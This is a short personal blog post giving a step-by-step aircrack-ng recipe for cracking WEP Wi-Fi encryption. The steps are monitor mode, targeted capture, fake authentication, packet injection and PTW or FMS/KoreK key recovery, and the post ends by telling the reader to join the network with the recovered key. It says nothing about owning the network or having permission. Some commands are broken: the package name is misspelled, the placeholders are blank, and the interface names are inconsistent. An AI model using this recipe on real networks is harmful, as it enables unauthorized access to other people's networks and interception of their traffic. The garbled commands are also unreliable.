WEP cracking

You need the following packages installed:

aircrack-ng

(from Synaptic or from terminal “sudo apt-get install aricrack-ng”)

Next I will give you the terminal commands – you just have to change the parts so that they reflect your situation (for example mac addresses, interfaces etc.).

The recipe

Start airmon on your wireless interface (“ip -d addr” might help if you’re not sure):

airmon-ng start wlan0

Monitoring traffic (enter number from 0 on instead of – sometimes you’ll have to backtrack here to change the channel):

airodump-ng -c , mon0

For example =11 and =00:02:72:51:DB:28 and =datel …

Monitoring specific AP traffic:
sudo airodump-ng -c –bssid 00:02:72:51:DB:28 -w wepdump -i mon0

Authentification:
sudo aireplay-ng -1 0 -e datel -a 00:02:72:51:DB:28 -h 00:11:DD:23:15:11 mon0
(-h is your personal MAC address – “ip -d link” if you don’t know)

Packet injection:
sudo aireplay-ng -3 -b 00:02:72:51:DB:28 -h 00:11:DD:23:15:11 wifi0

WEP cracking:
(a) PTW WEP-cracking method
sudo aircrack-ng -z -b 00:1A:92:77:BB:D9 wepdump*.ivs

(b) FMS/KoreK attack
sudo aircrack-ng -a 1 -0 -n 128 wepdump*.ivs

The output password will be given in a text file or on the screen. You can connect normally with it using network manager (GUI).

Update: if you don’t like the terminal and would prefer a GUI, I found WEPCrack – a C# Mono application quite a good choice. You can see the example of usage in this video.

Published by

metakermit

Building apps, analysing data at Punk Rock Dev and sharing weird & cool photographs, drawings, music, films, games... More about me here. You can get new blog posts via RSS or follow @metakermit on Twitter where I also announce new stuff.

Leave a Reply

Your email address will not be published. Required fields are marked *